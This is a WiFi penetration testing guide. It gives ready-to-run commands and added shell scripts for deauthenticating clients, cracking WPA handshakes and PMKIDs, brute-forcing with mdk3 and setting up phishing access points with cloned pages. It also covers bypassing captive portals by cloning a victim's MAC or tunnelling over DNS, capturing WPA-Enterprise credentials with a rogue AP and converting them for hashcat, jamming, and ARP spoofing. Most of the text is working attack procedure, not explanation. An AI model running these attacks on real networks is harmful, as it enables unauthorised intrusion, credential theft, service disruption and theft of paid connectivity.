WiFi Penetration Testing Guide
2.1. Captive portals
3.1. No clients
4.1. Cracking the 4-way-handshake
4.2. PMKID attack
4.3. AP-less attack
5.1. Fake Access Points
5.2. Brute force
6.1. Krack Attack and Frag Attack
6.2. OSINT
6.3. Wifi Jamming
6.4. Other frameworks
7.1. Attacking the router
7.2. Types of scanners
7.3. Spoofing
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
Set monitor mode
Run Airodump-ng
airodump-ng $IFACE -c $CHANNEL -e $ESSID
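The same monitor-mode setup with `ip` and `iw` (the `ifconfig`/`iwconfig` commands above are deprecated on current Linux distributions), plus the check a practitioner wants before starting a capture: that the card really reports monitor mode and sits on the expected channel. This is an added example, not code from the original guide; it assumes root, an nl80211 driver, and the guide's `$IFACE`/`$CHANNEL` variables. The `iw dev ... info` output embedded below is constructed to exercise the parsers offline.

```sh
#!/bin/sh
# Added example, not part of the original guide. Assumes root + nl80211 driver.

# Field extractors for the output of `iw dev <iface> info`, read on stdin.
iw_type_from_info()    { awk '$1 == "type"    { print $2; exit }'; }
iw_channel_from_info() { awk '$1 == "channel" { print $2; exit }'; }

# Put the interface into monitor mode and lock it on one channel. airodump-ng -c
# sets the channel itself, but aireplay-ng does not, so do it explicitly.
set_monitor() {
    iface="$1"; channel="$2"
    ip link set dev "$iface" down          || return 1
    iw dev "$iface" set type monitor       || return 1
    ip link set dev "$iface" up            || return 1
    iw dev "$iface" set channel "$channel" || return 1
}

# Exit status 0 only when the interface reports monitor mode on the given channel.
verify_monitor() {
    iface="$1"; channel="$2"
    info=$(iw dev "$iface" info) || return 1
    [ "$(printf '%s\n' "$info" | iw_type_from_info)" = "monitor" ] || return 1
    [ "$(printf '%s\n' "$info" | iw_channel_from_info)" = "$channel" ]
}

# Constructed sample of `iw dev wlan0mon info` output (not a real capture),
# used to try the parsers without hardware.
SAMPLE_IW_INFO='Interface wlan0mon
        ifindex 4
        wdev 0x1
        addr 00:11:22:33:44:55
        type monitor
        wiphy 0
        channel 6 (2437 MHz), width: 20 MHz (no HT), center1: 2437 MHz
        txpower 20.00 dBm'

# Usage on real hardware:
#   set_monitor "$IFACE" "$CHANNEL" && verify_monitor "$IFACE" "$CHANNEL" && echo ready
```

If `verify_monitor` fails right after `airmon-ng start`, the usual causes are NetworkManager/wpa_supplicant grabbing the card back (hence `airmon-ng check kill` above) or a driver that silently ignores `set type monitor`.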
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
List the networks using Airodump-ng and get the AP’s MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.
In another terminal, deauthenticate one client or all of them. When Airodump-ng captures a handshake for this network, "WPA handshake: $AP_MAC" appears in the top line of the first terminal:
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
2.a. Execute a dictionary attack
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. Or execute a bruteforce attack
mdk3 $IFACE p -t $AP_MAC -c $AP_CHANNEL -b $CHARACTER_SET
For the character set use l (lowercase letters), u (uppercase letters), n (digits), c (lowercase + uppercase), m (lowercase + uppercase + digits) or a (all printable characters).
Clone a website using HTTrack
Install Wifiphisher. Put the HTTrack result in a new folder at wifiphisher/data/phishing-pages/new_page/html and a configuration file at wifiphisher/data/phishing-pages/new_page/config.ini.
Reinstall the project with python setup.py install, or run the binary in bin.
This command works correctly in the latest Kali release after installing hostapd:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
The first method to bypass a captive portal is to change your MAC address to that of a client that has already authenticated (any station Airodump-ng shows associated with the portal's AP and passing traffic). Tools:
macchanger
A custom script like this (Bash)
Also, you can use scripts that automate the whole process, like:
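One way to automate the MAC-cloning method, as an added example that is not the original page's script: read the CSV that `airodump-ng -w $PREFIX` writes (`$PREFIX-01.csv`), pick the busiest station associated with the portal's AP (the one most likely to have passed the portal) and take over its address with `ip link`, which is what `macchanger -m` does underneath. It assumes root and a Linux host; the CSV embedded below is constructed, not a real capture.

```sh
#!/bin/sh
# Added example, not part of the original guide. Assumes root on Linux.

# Print the MACs of stations associated with BSSID $2 in airodump CSV $1,
# busiest (most packets) first.
associated_clients() {
    csv="$1"; bssid="$2"
    awk -F',' -v ap="$bssid" '
        /^Station MAC/ { in_stations = 1; next }   # station table is the 2nd section
        in_stations && NF >= 6 {
            sta = $1; apf = $6; pk = $5
            gsub(/^[ \t\r]+|[ \t\r]+$/, "", sta)
            gsub(/^[ \t\r]+|[ \t\r]+$/, "", apf)
            gsub(/[ \t\r]/, "", pk)
            if (toupper(apf) == toupper(ap)) print pk, sta
        }' "$csv" | sort -rn | awk '{ print $2 }'
}

busiest_client() { associated_clients "$1" "$2" | head -n 1; }

# Replace the interface MAC. You and the legitimate client now share one address
# on the same AP, so one of you will get dropped; deauthenticating it first
# (section 4.1) avoids fighting over the same association.
spoof_mac() {
    iface="$1"; mac="$2"
    [ -n "$mac" ] || { echo "no associated client found" >&2; return 1; }
    ip link set dev "$iface" down           || return 1
    ip link set dev "$iface" address "$mac" || return 1
    ip link set dev "$iface" up
}

# Constructed airodump-ng CSV: one open AP, two associated stations, one that is not.
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2019-01-01 10:00:00, 2019-01-01 10:05:00,  6,  54, OPN, , , -40, 100, 0, 0. 0. 0. 0, 9, HotelWifi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2019-01-01 10:01:00, 2019-01-01 10:05:00, -50, 250, AA:BB:CC:DD:EE:01, HotelWifi
77:88:99:AA:BB:CC, 2019-01-01 10:02:00, 2019-01-01 10:03:00, -70, 3, (not associated), 
DE:AD:BE:EF:00:01, 2019-01-01 10:02:00, 2019-01-01 10:05:00, -60, 40, AA:BB:CC:DD:EE:01, HotelWifi'

write_sample_csv() { printf '%s\n' "$SAMPLE_CSV" > "$1"; }

# Usage on a real capture:
#   spoof_mac "$IFACE" "$(busiest_client capture-01.csv "$AP_MAC")"
```

Packet count is only a heuristic: a station with traffic to the AP may still be stuck on the login page, so try the next candidate from `associated_clients` if the first one does not get you through.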
A second method is a DNS tunnel. It works when the portal forwards DNS queries from unauthenticated clients (many do, so that they can redirect you to the login page), and it requires a server of your own that is reachable as the authoritative nameserver for a subdomain. You can use this method to bypass the captive portal and get "free" Wifi in hotels, airports... First check that names resolve through the portal:
nslookup example.com
Create two records for a domain you control:
One "A record": dns.$DOMAIN pointing to $SERVER_IP (example: dns.domain.com pointing to 139.59.172.117)
One "NS record": hack.$DOMAIN pointing to dns.$DOMAIN (example: hack.domain.com pointing to dns.domain.com)
Then start iodined on the server (10.0.0.1 is the server's address inside the tunnel; -n is the public IP it answers NS queries with):
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
Check that the delegation works correctly here
On the client:
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 $SSH_USER@10.0.0.1
Once you are on the network, test whether it is vulnerable to man-in-the-middle attacks (for example, whether the AP enforces client isolation):
ARP Spoofing attack using Ettercap
Sniff the traffic using Wireshark or TCPdump
Analyze the traffic using PCredz (Linux) or Network Miner (Windows)
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE-01.cap
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST $PCAP_FILE-01.cap
You can get wordlists from here.
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
You can use this script or follow these steps:
Install hcxdumptool and hcxtools (you can use this script).
Stop Network Manager
airmon-ng check kill
3a. If you want to attack a specific MAC address
echo $MAC | sed 's/://g' > $FILTER_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
Each line has the form PMKID*AP MAC*STATION MAC*ESSID, where the ESSID is hex-encoded (decode it at https://www.rapidtables.com/convert/number/hex-to-ascii.html). Newer hcxtools releases replaced hcxpcaptool with hcxpcapngtool, which writes the combined 22000 format for hashcat -m 22000; the 16800 workflow here matches the older tool versions this guide was written against.
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
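Two small checks around the PMKID workflow, as an added example (not code from the guide or from hcxtools): building the filter-list entry hcxdumptool expects, and validating a hash line before handing it to hashcat, decoding the hex ESSID to confirm it is the target network and not a neighbour's. It accepts both the 16800 line above and the PMKID line of the newer 22000 format (`WPA*01*PMKID*AP*STATION*ESSID***`). Assumes POSIX sh and awk; the sample lines are constructed, not real captures.

```sh
#!/bin/sh
# Added example, not part of the original guide. POSIX sh + awk only.

# hcxdumptool's filter list wants one MAC per line, lowercase, no separators.
filter_mac() {
    printf '%s' "$1" | tr -d ':-' | tr 'A-F' 'a-f'
}

is_hex() {
    case "$1" in ''|*[!0-9a-fA-F]*) return 1 ;; esac
}

# Decode an even-length hex string to the bytes it encodes (the ESSID field).
hex_to_ascii() {
    printf '%s' "$1" | awk '
        BEGIN { for (i = 0; i < 16; i++) v[substr("0123456789abcdef", i + 1, 1)] = i }
        { s = tolower($0)
          for (i = 1; i <= length(s); i += 2)
              printf "%c", v[substr(s, i, 1)] * 16 + v[substr(s, i + 1, 1)] }'
}

# Validate one PMKID hash line (16800 or 22000 PMKID form) and print
# "APMAC STAMAC ESSID". Returns 1 on any malformed field.
parse_pmkid_line() {
    line="$1"
    case "$line" in WPA\*01\**) line=${line#WPA\*01\*}; line=${line%\*\*\*} ;; esac
    pmkid=${line%%\**}; rest=${line#*\*}
    ap=${rest%%\**};    rest=${rest#*\*}
    sta=${rest%%\**};   essid_hex=${rest#*\*}
    is_hex "$pmkid" && [ ${#pmkid} -eq 32 ] || return 1   # PMKID is 16 bytes
    is_hex "$ap"    && [ ${#ap}    -eq 12 ] || return 1   # 6-byte MAC
    is_hex "$sta"   && [ ${#sta}   -eq 12 ] || return 1
    is_hex "$essid_hex" && [ $(( ${#essid_hex} % 2 )) -eq 0 ] \
        && [ ${#essid_hex} -le 64 ] || return 1            # ESSID is at most 32 bytes
    printf '%s %s %s\n' "$ap" "$sta" "$(hex_to_ascii "$essid_hex")"
}

# Constructed sample lines (ESSID "MyHomeNet"); the PMKID value is made up.
SAMPLE_16800='0123456789abcdef0123456789abcdef*a0b1c2d3e4f5*112233445566*4d79486f6d654e6574'
SAMPLE_22000='WPA*01*0123456789abcdef0123456789abcdef*a0b1c2d3e4f5*112233445566*4d79486f6d654e6574***'

# Usage:
#   filter_mac "$AP_MAC" > "$FILTER_FILE"
#   while read -r l; do parse_pmkid_line "$l" || echo "bad line: $l" >&2; done < "$HASH_FILE"
```

Only lines that pass `parse_pmkid_line` are worth the GPU time; a mismatched ESSID means the AP answered with a PMKID for a different network name than the one you are authorised to test. The `--force` flag on the hashcat command above only suppresses warnings (typically about drivers) and should not be needed on a working install.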
If you have access to a client device with Wi-Fi enabled but the target network is not in range, you can still attack that network as long as the client has connected to it before (it is in the device's saved networks).
For that, create a fake access point with hostapd using a configuration file like this one: any passphrase, but the same network name and security type. When the client tries to join, capture the exchange as in section 4.1. The client will only get through the first two EAPOL messages (message 3 from your AP fails its MIC check because the passphrases differ), but message 2 carries a MIC computed with the real PSK, so messages 1 and 2 are enough for aircrack-ng or hashcat to run the dictionary attack.
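A minimal hostapd configuration for this attack and the capture that goes with it, as an added example (not the configuration file the guide links to). It assumes root, hostapd installed, one interface for the fake AP (`$IFACE`) and a second one already in monitor mode (`$MON_IFACE`) for airodump-ng; the network name, channel and passphrase are placeholders.

```sh
#!/bin/sh
# Added example, not part of the original guide. Assumes root, hostapd, and a
# second wireless interface in monitor mode for the capture.

# Print a hostapd.conf for a WPA2-PSK network named $1 on interface $2.
# The passphrase will never match the client's, but hostapd insists on 8-63 chars.
write_hostapd_conf() {
    ssid="$1"; iface="$2"; channel="${3:-6}"; pass="${4:-anypassphrase}"
    cat <<EOF
interface=$iface
driver=nl80211
ssid=$ssid
hw_mode=g
channel=$channel
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=$pass
EOF
}

# Start the fake AP and, in the background, capture frames to/from its BSSID.
# Stop with Ctrl-C; the M1/M2 exchange then sits in $pcap-01.cap.
run_apless_attack() {
    essid="$1"; iface="$2"; mon_iface="$3"; channel="${4:-6}"; pcap="${5:-apless}"
    conf=$(mktemp /tmp/hostapd.XXXXXX) || return 1
    write_hostapd_conf "$essid" "$iface" "$channel" > "$conf"
    bssid=$(cat /sys/class/net/"$iface"/address)      # the fake AP's MAC
    airodump-ng -c "$channel" --bssid "$bssid" -w "$pcap" "$mon_iface" &
    dump=$!
    hostapd "$conf"
    kill "$dump" 2>/dev/null
    rm -f "$conf"
}

# Usage:
#   run_apless_attack "$ESSID" "$IFACE" "$MON_IFACE" 6 "$PCAP_FILE"
#   aircrack-ng -w "$WORDLIST" "$PCAP_FILE-01.cap"
```

If the saved network used WPA (TKIP) rather than WPA2, set `wpa=1` and `wpa_pairwise=TKIP` instead; a client will not join an AP whose advertised security type differs from the profile it saved.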
Operating system | Platform | Credentials | Size | Link |
---|---|---|---|---|
Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 GB | MEGA |
Kali 2019.1 | VMware | root:wifi | 4.99 GB | MEGA |
Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | MEGA |
Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 GB | MEGA |
In case you do not want to use the virtual machine, you can install everything using:
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.sh
Start the Access Point using:
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
When a client connects, read logs with:
sh freeradius_wpe_read.sh
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
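What to do with the log once a client has sent its MSCHAPv2 credentials, as an added example that is not part of the guide or of the WPA_Enterprise_Attack scripts: convert each challenge/response pair into the NetNTLMv1 line that `hashcat -m 5500` takes (`user::::response:challenge`), skipping entries the log has not finished writing. The log layout assumed here is the one freeradius-wpe produces (an `mschap:` header followed by `username:`, `challenge:` and `response:` lines, usually in /var/log/freeradius-server-wpe.log); the two entries below are constructed.

```sh
#!/bin/sh
# Added example, not part of the original guide. POSIX sh + awk only.

# Read a freeradius-wpe log on stdin, print one hashcat -m 5500 line per
# complete MSCHAPv2 exchange. The 8-byte challenge and 24-byte response are
# length-checked so a truncated entry is skipped rather than emitted broken.
wpe_to_hashcat() {
    awk '
        $1 == "username:"  { user = $2 }
        $1 == "challenge:" { chal = $2; gsub(/:/, "", chal) }
        $1 == "response:"  {
            resp = $2; gsub(/:/, "", resp)
            if (user != "" && length(chal) == 16 && length(resp) == 48)
                printf "%s::::%s:%s\n", user, resp, chal
            user = ""; chal = ""
        }'
}

# Constructed log: one complete entry and one with a truncated (7-byte) challenge.
SAMPLE_WPE_LOG='mschap: Sun Mar 12 11:08:52 2017
     username:  jdoe
     challenge: 3a:5f:8c:12:a0:4e:77:19
     response:  7c:ae:64:28:19:e4:f2:1c:00:1b:5e:4a:3d:9f:c2:81:2b:55:e9:90:41:c3:d7:08
mschap: Sun Mar 12 11:09:30 2017
     username:  alice
     challenge: 00:11:22:33:44:55:66
     response:  ab:cd:ef:01:23:45:67:89:ab:cd:ef:01:23:45:67:89:ab:cd:ef:01:23:45:67:89'

# Usage:
#   wpe_to_hashcat < /var/log/freeradius-server-wpe.log > wpe.hashes
#   hashcat -a 0 -m 5500 wpe.hashes "$WORDLIST"
```

The same pair can be fed to asleap directly (`asleap -C <challenge> -R <response> -W wordlist`) with the colon-separated values as they appear in the log. Note that usernames often arrive as `DOMAIN\user`; hashcat accepts that unchanged in the first field.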
Find supported EAP methods
These are two advanced attacks discovered by the great Mathy Vanhoef:
Krack Attack Scripts - Explained in this website
Frag Attack Scripts - Explained in this website
An example to deauthenticate all the devices except a Fake Access Point:
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
Linux:
Windows:
Once you are connected to the network
Nmap/Zenmap - Security Scanner, Port Scanner, & Network Exploration Tool
Masscan - A much faster port scanner than Nmap (it can break things, so be careful)
Netdiscover - ARP sniffing. Very useful if the networks are very well segmented